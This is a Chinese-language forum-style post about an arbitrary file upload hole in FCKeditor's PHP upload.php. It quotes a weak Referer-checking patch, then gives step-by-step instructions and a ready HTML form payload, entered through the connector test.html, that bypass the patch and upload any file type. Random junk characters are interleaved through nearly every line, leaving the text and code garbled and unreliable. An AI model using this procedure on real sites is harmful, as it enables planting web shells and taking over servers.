漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php0 w/ ], F/ I4 u# d
网上给出的修复方案是
- v6 g* }/ ?* q& @修复方法,删除FCK编辑器用其他的编辑器3 I3 W0 ~+ \' s2 I& O
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件& r9 w8 n( [- c: ]" r4 U& z
在) I2 L. ?- o6 X2 K
require(‘config.php’);
) y c8 n6 h- s6 l3 S: X7 Prequire(‘util.php’);
/ `- {9 q. `/ X9 D$ q) m% {& _的下面添加以下代码—————————–' N1 w/ J2 C4 _, t8 U. O
//防止外部提交
- x( S/ D4 n. r7 h# ]" x/ _function outsidepost()3 j, J0 x) h! ?5 A8 w v+ V8 T
{
8 T& }* ~. U; E+ f* o1 ~$servername=$_SERVER['SERVER_NAME'];- o- P( R5 l r% E& L, P: w
$sub_from=@$_SERVER['HTTP_REFERER'];6 V) ]8 X7 E; d) j$ v b j
$sub_len=strlen($servername);4 {, C; w' S o1 h: L" Z- y, o
$checkfrom=substr($sub_from,7,$sub_len);5 {. g1 h8 |8 W3 x
if($checkfrom!=$servername){, X. X. I2 c- I
echo(“you don’t outsidepost!”);
; _$ x3 m$ N. x3 J( H3 Cexit;
4 D$ D1 u0 ^4 [4 W/ {}& y/ l2 a( `+ g& O* \
}' I5 V7 R/ P( n3 P; m( R
outsidepost();
: z9 N3 w9 ^1 [( S* T' o9 L8 T防止外部提交,但是没有防止内部提交,3 N6 _/ D8 B+ Y: {
利用方法:
; x4 h5 A$ |& z* O1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html2 t+ c. D/ o& @& e
2,在Current Folder 框输入
0 g' `( u1 n8 v( q3 U$ s<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>! [$ U. T, { d9 B" d
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
% s% r. G% [9 [PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |